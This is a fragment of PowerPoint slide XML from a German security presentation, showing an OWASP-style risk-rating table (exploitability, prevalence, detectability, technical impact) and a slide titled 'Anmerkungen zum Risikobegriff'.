              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="659055653"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="121920" y="6164417"/>
          <a:ext cx="6629400" cy="3019053"/>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69600">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="110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525600">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Anwendungs</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>-</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1000" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>spezifisch</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="10800" marR="108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err="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Ausnutzbarkeit</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1000" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" err="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>E</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" err="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>infach</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="10800" marR="108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baseline="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Verbreitung</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Sehr</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>häufig</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="10800" marR="108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err="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Auffindbarkeit</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" err="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Einfach</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="10800" marR="108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de-DE" sz="1000" b="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Technisch</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="1000">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Mittel</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="10800" marR="108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1000" b="1" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Daten</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>- &amp;</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1000" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Geschäfts-spezifisch</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="10800" marR="108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823853">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="2600" b="1" kern="0" baseline="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr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600" b="1" kern="0" baseline="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" b="1" kern="0" baseline="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>3</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a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="900"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" kern="0" baseline="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Durch-schnitt</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2000" b="1" kern="0" baseline="0">
                        <a:solidFill>
                          <a:srgbClr val="00B050"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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b="1" kern="0" baseline="0">
                        <a:solidFill>
                          <a:srgbClr val="00B050"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" b="1" kern="0" baseline="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>= 3,0</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0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="2200" b="1" kern="0" baseline="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1500"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" b="1" kern="0" baseline="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>*</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a:solidFill>
                          <a:srgbClr val="00000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0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="2600" b="1" kern="0" baseline="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1500"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" b="1" kern="0" baseline="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>2</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a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr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Rectangle 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3699030" y="8676800"/>
            <a:ext cx="1028819" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>= 6,0</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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+R</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Titel 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Anmerkungen zum Risikobegriff</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="30" name="Gruppieren 29"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="123003" y="6213140"/>
            <a:ext cx="5903422" cy="507831"/>
            <a:chOff x="-36022" y="960200"/>
            <a:chExt cx="5903422" cy="509406"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="31" name="Group 40"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="-36022" y="960200"/>
              <a:ext cx="5903422" cy="509406"/>
              <a:chOff x="-36022" y="972543"/>
              <a:chExt cx="5903422" cy="509406"/>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bIns="25200" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" err="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Auswir</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US"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br>
                  <a:rPr lang="en-US"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kung</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="36" name="Group 63"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="524757" y="1105372"/>
                <a:ext cx="139698" cy="305288"/>
                <a:chOff x="196" y="1565"/>
                <a:chExt cx="288" cy="625"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="42" name="Oval 64"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="244"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a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="43" name="Line 65"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="340" y="1757"/>
                  <a:ext cx="0" cy="240"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1">
                    <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="44" name="Line 66"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm flipH="1">
                  <a:off x="196" y="1997"/>
                  <a:ext cx="144" cy="193"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1">
                    <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="45" name="Line 67"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
